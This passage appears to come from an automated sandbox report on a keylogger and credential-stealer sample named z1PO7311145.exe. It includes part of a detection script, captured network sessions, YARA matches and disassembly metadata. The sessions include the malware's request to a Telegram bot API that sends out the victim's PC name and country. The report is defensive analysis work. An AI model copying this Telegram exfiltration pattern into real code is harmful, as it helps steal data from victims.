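                    alerts.append({"pid": pid, "ip": ip, "country": c.group(1) if c else None,
                                   "ip_check_at": t0.isoformat(timespec="milliseconds"),
                                   "geo_at": t.isoformat(timespec="milliseconds"),
                                   "legacy_ua": legacy, "no_ua_on_geo": ua is None})
                    break
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE):
        print(a)
```

Matching on the echoed IP rather than only on the two hostnames is what keeps the rule specific: a benign IP-echo request and an unrelated geolocation call will not pair up unless the second one asks about exactly the address the first one returned, which is the behaviour these sessions show (the first four dyndns requests on this page differ from the later four only by the added Connection: Keep-Alive header, so the User-Agent, not the request size, is the stable part of the fingerprint).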


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    3 | 192.168.2.7 | 49705 | 188.114.97.3 | 443 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-07 13:32:14 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:14 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:14 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64269
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUt3Fai9%2BvCCh%2BxIJEZkRHeMnj9R0qxGzawi7XIT87P3jZE1t7tzgwphYvOb7fx771G5rlu8bLIY05zO0NZvlKi9fJDkwHliFgovSpfwTZlHeNwKXgbcvW3hJ6RGV6Hbl8K946Zd"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee418d3e535e6d-EWR
                                                                                    2024-10-07 13:32:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49707 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6492 | Process: C:\Users\user\Desktop\z1PO7311145.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 13:32:15 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 13:32:15 UTC | 674 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:15 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 64270
Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8ZlRodq43f0EneKnktrw0XV7Kwj0afnQgtGO7dmApTioERFA8i22zVbO4LY2I9DbhSk%2FMi2VKWlpcISBSYky54MErdP61Bd%2FF1A0u17ZjGOoRY9HANDMmI9ZoQlHKZU02eKCfkC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cee41949b83199d-EWR
2024-10-07 13:32:15 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 13:32:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a / Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49709 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6492 | Process: C:\Users\user\Desktop\z1PO7311145.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 13:32:16 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 13:32:17 UTC | 708 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:17 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 64272
Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcxzLDrX6lDoGuLlBH7%2FJ8B1UAOWeO4a6gPZajyDMjmW2wPo7Wr0ltsj67T42hYBdRyNOLkXFzlo2Fw8sEsEqTxyR39Q%2BYlK%2F4rxwjRYcP7eaDvvopHn498QPRlYdcVnt6USwt%2FQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cee419e793842e2-EWR
alt-svc: h3=":443"; ma=86400
2024-10-07 13:32:17 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 13:32:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a / Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49711 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6492 | Process: C:\Users\user\Desktop\z1PO7311145.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 13:32:18 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 13:32:18 UTC | 672 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:18 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 64273
Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t3qsBBHcOEztA8KKGWPO2WTSmbF8HSBWxAH5DfjVCqEaQzDKUJtuz3yiKKBecHry68rQ2w9sm%2BG10jJhSjZ5x1mv7r5SWvJMi5TpYRh3xoGyJHsQrqwzBEZsPE8sBaLe9hiMMJWM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cee41a59f150f88-EWR
2024-10-07 13:32:18 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 13:32:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a / Data Ascii: 0


Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49713 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6492 | Process: C:\Users\user\Desktop\z1PO7311145.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 13:32:19 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 13:32:19 UTC | 674 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:19 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 64274
Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTxmlYsWamPRsRvbqijIWEKASIaiRkOj2KF8KnGyyy6DIYgYP%2BbD9VxipM7lkjrvIViLmQrggya5qyYJ1Bu0cTmK9nlNunVjqVcuW%2FnmBTkIGoLJ5ugOP6Rhnl99A4wfJqWNyg8z"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cee41ae88587c7e-EWR
2024-10-07 13:32:19 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 13:32:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a / Data Ascii: 0


Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49716 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6492 | Process: C:\Users\user\Desktop\z1PO7311145.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 13:32:21 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-07 13:32:21 UTC | 678 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:21 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 64276
Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GUS27hx%2FBgsN2UbUYhpa5%2FswtSZZUBU7t3OaGkRRB74MGAbote2l0CO6RtajLaGwNkfPLY4VfwjsDA%2BZrXVwUX8maqXzht0Y1sF1ZVszFxpN1Tmo1xM%2F1e8Jt1KNUzcVlbgJObcc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cee41bbf8ad8c6b-EWR
2024-10-07 13:32:21 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 13:32:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a / Data Ascii: 0


Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49722 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 6492 | Process: C:\Users\user\Desktop\z1PO7311145.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 13:32:22 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:27:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-07 13:32:23 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 07 Oct 2024 13:32:23 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 13:32:23 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 09:32:07
Start date: 07/10/2024
Path: C:\Users\user\Desktop\z1PO7311145.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\z1PO7311145.exe"
Imagebase: 0xb30000
File size: 276'992 bytes
MD5 hash: B9A13749CC0659A2076AFCA8F7474509
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 16.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 74.5%
Total number of Nodes: 55
Total number of Limit Nodes: 9

                                                                                      Control-flow Graph (rendered with executed / not-executed block colouring; basic-block edge list omitted here)
                                                                                      • Function at 2da7118 (basic blocks 2da7118 to 2da755d)
                                                                                      • Calls: 2da76f1 (from block 2da73ee-2da740d)
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (oq$(oq$(oq$,q$,q
                                                                                      • API String ID: 0-189141485
                                                                                      • Opcode ID: 77a0daeb042d9f360f101ab606a84b0daf5860e87ed8b4ae060492397fa19162
                                                                                      • Instruction ID: 71b565a8db049c10008088b4304de0ff270e8df4312d9313d1ef60f1c3e23284
                                                                                      • Opcode Fuzzy Hash: 77a0daeb042d9f360f101ab606a84b0daf5860e87ed8b4ae060492397fa19162
                                                                                      • Instruction Fuzzy Hash: D3E1F571A002199FEB15CFA9D8A4EADFBF2BF88304F558065E855AB365D730EC41CB50

                                                                                      Control-flow Graph (rendered with executed / not-executed block colouring; basic-block edge list omitted here)
                                                                                      • Function entered at 2da29ec (basic blocks 2da2981 to 2da39e8)
                                                                                      • Calls: 2da02c8 (from blocks 2da2b45-2da2b63 and 2da2b92-2da2bb0)
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xq$Xq$Xq$Xq
                                                                                      • API String ID: 0-3965792415
                                                                                      • Opcode ID: f64ba9e5430b27c19a18570a102ab845c32936e8967e048f1184f1afa361c8ce
                                                                                      • Instruction ID: bb32736cae41da0e67ddbc5416b0963e708f92c5e09d433e6084974a0c88cdf9
                                                                                      • Opcode Fuzzy Hash: f64ba9e5430b27c19a18570a102ab845c32936e8967e048f1184f1afa361c8ce
                                                                                      • Instruction Fuzzy Hash: F8F1D6319047968FDB924F7A84647DABFB2FF8B318B0945F9C8C55A601CB345C5ACB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N
                                                                                      • API String ID: 0-1130791706
                                                                                      • Opcode ID: c53cbdf9b0a085ccbf5dfa2e0ecdc71a783e89a4993fd4a1783daad9af3ae6a8
                                                                                      • Instruction ID: dc082e61890c88ace55cadfdc2d5c40d98be401a7c70c9c9c3b59330e98b5dd9
                                                                                      • Opcode Fuzzy Hash: c53cbdf9b0a085ccbf5dfa2e0ecdc71a783e89a4993fd4a1783daad9af3ae6a8
                                                                                      • Instruction Fuzzy Hash: 2973F571D1075A8EDB11EF68C844A99FBB1FF99300F15D6DAE44867221EB70AAC4CF81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: K
                                                                                      • API String ID: 0-856455061
                                                                                      • Opcode ID: 0314b04afdda5cfa2cd2be5bda76ec6f3a1a03a4f0a11c1b3046fa14ab19843b
                                                                                      • Instruction ID: aa7a5e6609f64b1bf8fd960d8fdc4f7de9b1e6430636aab69109194cd1311f34
                                                                                      • Opcode Fuzzy Hash: 0314b04afdda5cfa2cd2be5bda76ec6f3a1a03a4f0a11c1b3046fa14ab19843b
                                                                                      • Instruction Fuzzy Hash: ED33F271D146298EDB51EF68C884A9DF7B1FF99300F10D2DAD4486B261EB70AAC4CF81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (oq$4'q
                                                                                      • API String ID: 0-1336004174
                                                                                      • Opcode ID: f91e198ec26995cbd94568f02512a1bb1bdaffe5e50e70e0d5bb3e771f16f33b
                                                                                      • Instruction ID: 2a0c80cab20052e3a8b64634d222f88d53bf55ca1e2aa1a197e268628002643a
                                                                                      • Opcode Fuzzy Hash: f91e198ec26995cbd94568f02512a1bb1bdaffe5e50e70e0d5bb3e771f16f33b
                                                                                      • Instruction Fuzzy Hash: 9D825B71A00209DFCB15CFA8C5A4EAEBBF2BF88314F158669E8069B365D731ED41CB51

                                                                                      Control-flow Graph (rendered with executed / not-executed block colouring; basic-block edge list omitted here)
                                                                                      • Function at 2da69b0 (basic blocks 2da69b0 to 2da7113)
                                                                                      • Calls: 2da7118 (from block 2da6fb1-2da700c); at 2da6ac1, 2da69b0 (self) or 2da69a0; at 2da708d, 2daa0e8, 2daa088 or 2da9dd0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (oq$Hq
                                                                                      • API String ID: 0-2917151738
                                                                                      • Opcode ID: 0c2a87d387bed2f61f992e498b2b60c0a35b3f64d2b74954c872d55eba3c75a4
                                                                                      • Instruction ID: 6470292c1dccf5976986a8b4c22b185d627b2f52a800b4032e176e91d163fc8a
                                                                                      • Opcode Fuzzy Hash: 0c2a87d387bed2f61f992e498b2b60c0a35b3f64d2b74954c872d55eba3c75a4
                                                                                      • Instruction Fuzzy Hash: 52225D70A002199FDB14DF69C864BAEBBBABF88340F148569E906DB395DF34DD41CB90

                                                                                      Control-flow Graph (rendered with executed / not-executed block colouring; basic-block edge list omitted here)
                                                                                      • Function at 2dac148 (basic blocks 2dac148 to 2dac413)
                                                                                      • Calls: 2da41a0 and 2da3cc0 (from block 2dac1da-2dac2ac); 2da5658 (from block 2dac2b3-2dac2d4)
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: fc8e5c17743d2d5cddefe1715b1ffe0ba26c78386b4355a55b7769df94eb4059
                                                                                      • Instruction ID: 387cf75ee6ced5e36ad84f599464e12c567b37f45eee1d0d5b0a6a9e5ed33d41
                                                                                      • Opcode Fuzzy Hash: fc8e5c17743d2d5cddefe1715b1ffe0ba26c78386b4355a55b7769df94eb4059
                                                                                      • Instruction Fuzzy Hash: 88A1D575E10218DFEB14DFAAD894A9DBBF2BF89310F14806AE449AB365DB309C41CF54

                                                                                      Control-flow Graph (rendered with executed / not-executed block colouring; basic-block edge list omitted here)
                                                                                      • Function at 2da5362 (basic blocks 2da5362 to 2da55ec)
                                                                                      • Calls: 2da41a0 and 2da3cc0 (from block 2da53c4-2da5484); at 2da54ac, 2da5658 or 2da5649
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: c564bd322dffc8189bd2368f1145a293de697861e9e73979518064eb3ad66276
                                                                                      • Instruction ID: ccfe758500d84e4627bd8b9048f2448610ccc02c70862337257254dad2d23365
                                                                                      • Opcode Fuzzy Hash: c564bd322dffc8189bd2368f1145a293de697861e9e73979518064eb3ad66276
                                                                                      • Instruction Fuzzy Hash: DA91B074E00218CFEB14DFAAD994A9DBBF2BF88300F549069E809AB365DB709D45CF10

                                                                                      Control-flow Graph (rendered with executed / not-executed block colouring; basic-block edge list omitted here)
                                                                                      • Function at 2dac468 (basic blocks 2dac468 to 2dac6e3)
                                                                                      • Calls: 2da41a0 and 2da3cc0 (from block 2dac49f-2dac57c); 2da5658 (from block 2dac583-2dac5a4)
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: 455ef1c9ffcfc3dcf53a1869d1adea97ce3ddcbbb4bed491e2df807ff443d009
                                                                                      • Instruction ID: db5ff1593850128b6b47de26dbef10b0911ff5f8e9a99f1c33d2cb72c0ff61e4
                                                                                      • Opcode Fuzzy Hash: 455ef1c9ffcfc3dcf53a1869d1adea97ce3ddcbbb4bed491e2df807ff443d009
                                                                                      • Instruction Fuzzy Hash: B781B174E00258CFEB14DFAAD994B9DBBF2BF88310F14916AE419AB365DB309941CF50

                                                                                      Control-flow Graph (rendered with executed / not-executed block colouring; basic-block edge list omitted here)
                                                                                      • Function at 2daca08 (basic blocks 2daca08 to 2dacc83)
                                                                                      • Calls: 2da41a0 and 2da3cc0 (from block 2daca3f-2dacb1c); 2da5658 (from block 2dacb23-2dacb44)
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: 77452e8bade71c7c8077d85e86c0689d6e2114f456a1738d3b2b5961af03363f
                                                                                      • Instruction ID: 52d53aafaee6a31c7bc8030d075a97c2b3dabdc7769c380caed5e85b1032263e
                                                                                      • Opcode Fuzzy Hash: 77452e8bade71c7c8077d85e86c0689d6e2114f456a1738d3b2b5961af03363f
                                                                                      • Instruction Fuzzy Hash: AE81A174E11218CFEB54DFAAD894A9DBBF2BF88310F14C06AD819AB365DB319941CF50

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 2307 2dad278-2dad2a8 2308 2dad2aa 2307->2308 2309 2dad2af-2dad38c call 2da41a0 call 2da3cc0 2307->2309 2308->2309 2319 2dad38e 2309->2319 2320 2dad393-2dad3b4 call 2da5658 2309->2320 2319->2320 2322 2dad3b9-2dad3c4 2320->2322 2323 2dad3cb-2dad3cf 2322->2323 2324 2dad3c6 2322->2324 2325 2dad3d1-2dad3d2 2323->2325 2326 2dad3d4-2dad3db 2323->2326 2324->2323 2327 2dad3f3-2dad437 2325->2327 2328 2dad3dd 2326->2328 2329 2dad3e2-2dad3f0 2326->2329 2333 2dad49d-2dad4b4 2327->2333 2328->2329 2329->2327 2335 2dad439-2dad44f 2333->2335 2336 2dad4b6-2dad4db 2333->2336 2340 2dad479 2335->2340 2341 2dad451-2dad45d 2335->2341 2342 2dad4dd-2dad4f2 2336->2342 2343 2dad4f3 2336->2343 2346 2dad47f-2dad49c 2340->2346 2344 2dad45f-2dad465 2341->2344 2345 2dad467-2dad46d 2341->2345 2342->2343 2347 2dad477 2344->2347 2345->2347 2346->2333 2347->2346
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHq$PHq
                                                                                      • API String ID: 0-1274609152
                                                                                      • Opcode ID: e10179ecfe3ae3a8ebe3c854009cdb77ea62e1e144c6ceedbc1551062d977ff3
                                                                                      • Instruction ID: a7a9f6750c90afe1ac8958c87fa1ad2b6105aac37dc4f1fc1eeb9a33f2115172
                                                                                      • Opcode Fuzzy Hash: e10179ecfe3ae3a8ebe3c854009cdb77ea62e1e144c6ceedbc1551062d977ff3
                                                                                      • Instruction Fuzzy Hash: 8581A274E01218CFEB58DFAAD894A9DBBF2BF88300F14C069E449AB365DB709945CF10

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 2263 2daccd8-2dacd08 2264 2dacd0a 2263->2264 2265 2dacd0f-2dacdec call 2da41a0 call 2da3cc0 2263->2265 2264->2265 2275 2dacdee 2265->2275 2276 2dacdf3-2dace14 call 2da5658 2265->2276 2275->2276 2278 2dace19-2dace24 2276->2278 2279 2dace2b-2dace2f 2278->2279 2280 2dace26 2278->2280 2281 2dace31-2dace32 2279->2281 2282 2dace34-2dace3b 2279->2282 2280->2279 2283 2dace53-2dace97 2281->2283 2284 2dace3d 2282->2284 2285 2dace42-2dace50 2282->2285 2289 2dacefd-2dacf14 2283->2289 2284->2285 2285->2283 2291 2dace99-2daceaf 2289->2291 2292 2dacf16-2dacf3b 2289->2292 2296 2daced9 2291->2296 2297 2daceb1-2dacebd 2291->2297 2298 2dacf3d-2dacf52 2292->2298 2299 2dacf53 2292->2299 2302 2dacedf-2dacefc 2296->2302 2300 2dacebf-2dacec5 2297->2300 2301 2dacec7-2dacecd 2297->2301 2298->2299 2303 2daced7 2300->2303 2301->2303 2302->2289 2303->2302
                                                                                      Strings
                                                                                      Memory Dump Source
